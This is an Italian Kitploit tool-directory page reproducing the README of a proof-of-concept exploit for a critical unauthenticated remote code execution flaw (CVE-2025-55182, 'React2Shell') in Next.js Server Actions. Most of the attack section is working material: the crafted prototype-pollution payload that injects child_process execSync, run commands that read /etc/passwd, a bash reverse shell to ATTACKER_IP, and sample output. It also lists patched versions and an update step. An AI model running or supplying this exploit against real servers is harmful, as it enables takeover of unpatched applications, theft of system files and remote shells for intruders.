Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/d0cnull/nextjs-cve-2025-55182
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e FormazioneStrumento di Accesso RemotoSviluppo Payload

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
d0cnull/nextjs-cve-2025-55182

nextjs-CVE-2025-55182

Exploit proof-of-concept per RCE critico non autenticato nelle Server Actions di Next.js tramite deserializzazione del React Flight Protocol, che consente l'esecuzione arbitraria di comandi su server vulnerabili.

Vedi Repository
8 mesi faNon ancora revisionato

CVE-2025-55182 / CVE-2025-66478 (React2Shell) - Esecuzione Remota di Codice (RCE) in Next.js PoC

Vulnerabilità critica nelle Server Actions di Next.js che consente l'esecuzione remota di codice non autenticata tramite deserializzazione del React Flight Protocol

Panoramica

Questo repository contiene un Proof of Concept (PoC) per la vulnerabilità critica RCE che colpisce le applicazioni Next.js che utilizzano Server Actions (React Server Functions).

DettaglioInformazione
CVECVE-2025-55182 / CVE-2025-66478
GravitàCritica (CVSS 10.0)
React interessatoReact 19.0.0, 19.1.0, 19.1.1, 19.2.0
Next.js interessatoNext.js 15.x, 16.x, 14.3.0-canary.77+
NON interessatoNext.js 14.x stabile, 13.x, Pages Router, Edge Runtime
Next.js corretto15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7
React corretto19.0.1, 19.1.2, 19.2.1
TipoEsecuzione Remota di Codice (RCE)
Autenticazione richiestaNessuna

Descrizione della vulnerabilità

La vulnerabilità risiede nel modo in cui il React Flight Protocol deserializza i chunk durante l'elaborazione delle Server Actions. Un attaccante può sfruttare l'inquinamento del prototipo tramite dati di form manipolati per:

  1. Accedere al costruttore Function attraverso la traversata della catena dei prototipi (__proto__)
  2. Eseguire codice JavaScript arbitrario sul server
  3. Ottenere la piena esecuzione remota di codice senza autenticazione

Ciò avviene prima di qualsiasi validazione dell'azione del server, rendendolo sfruttabile su qualsiasi app Next.js con Server Actions abilitate.

Applicazioni interessate

Qualsiasi applicazione Next.js è vulnerabile se:

  • Utilizza Server Actions (predefinito in App Router)
  • Esegue Next.js 15.x o 16.x (o 14.3.0-canary.77+)
  • Non sono presenti mitigazioni specifiche

Utilizzo

Requisiti

root@kitploit:~
pip install requests

Esecuzione del PoC

root@kitploit:~
python3 poc.py <TARGET_URL> "<COMANDO>"

Esempi

root@kitploit:~
# Test di esecuzione comando
python3 poc.py http://localhost:3000 "id"

# Lettura di file sensibili
python3 poc.py http://localhost:3000 "cat /etc/passwd"

# Shell inversa (solo per test autorizzati)
python3 poc.py http://localhost:3000 "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

Output di esempio

root@kitploit:~
$ python3 poc.py http://localhost:3000 "whoami"
500
0:{"a":"$@1","f":"","b":"development"}
1:E{"digest":"www-data","message":"NEXT_REDIRECT","stack":[],"env":"Server"}

L'output del comando appare nel campo digest.

Dettagli tecnici

Lo sfruttamento sfrutta il meccanismo di risoluzione dei chunk del React Flight Protocol:

root@kitploit:~
crafted_chunk = {
    "then": "$1:__proto__:then",
    "status": "resolved_model",
    "reason": -1,
    "value": '{"then": "$B0"}',
    "_response": {
        "_prefix": f"process.mainModule.require('child_process').execSync('{cmd}');",
        "_formData": {
            "get": "$1:constructor:constructor",
        },
    },
}

Catena dell'attacco:

  1. Traversata del prototipo tramite $1:__proto__:then
  2. Accesso al costruttore Function tramite $1:constructor:constructor
  3. Iniezione di codice arbitrario tramite il campo _prefix
  4. Il codice viene eseguito durante la deserializzazione (pre-autenticazione)

Mitigazione

Aggiornare immediatamente:

root@kitploit:~
npm install next@latest
# oppure
pnpm update next

Versioni corrette: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7

Nota: Next.js 14.x stabile e 13.x NON sono vulnerabili.

Dichiarazione di non responsabilità

⚠️ Questo PoC è solo a scopo educativo e per test di sicurezza autorizzati.

L'accesso non autorizzato a sistemi informatici è illegale. Utilizzare questo strumento solo su sistemi di propria proprietà o per i quali si dispone di esplicita autorizzazione al test. Gli autori non sono responsabili per qualsiasi uso improprio.

Crediti

Basato sulla ricerca originale di @msanft. Il pieno credito per la scoperta della vulnerabilità e il PoC iniziale va a loro.

Riferimenti

  • Ricerca originale CVE-2025-55182
  • Avviso ufficiale CVE di Next.js
  • Analisi Wiz Research - React2Shell
  • React Flight Protocol
  • NIST NVD - CVE-2025-55182

Parole chiave

Next.js RCE, vulnerabilità Next.js, CVE-2025-55182, CVE-2025-66478, React2Shell, exploit React Server Components, RCE Server Actions Next.js, inquinamento prototipo Next.js, vulnerabilità React Flight Protocol, sicurezza Next.js, esecuzione remota codice Next.js, exploit PoC Next.js, vulnerabilità Server Actions, React RSC RCE

Scarica lo strumento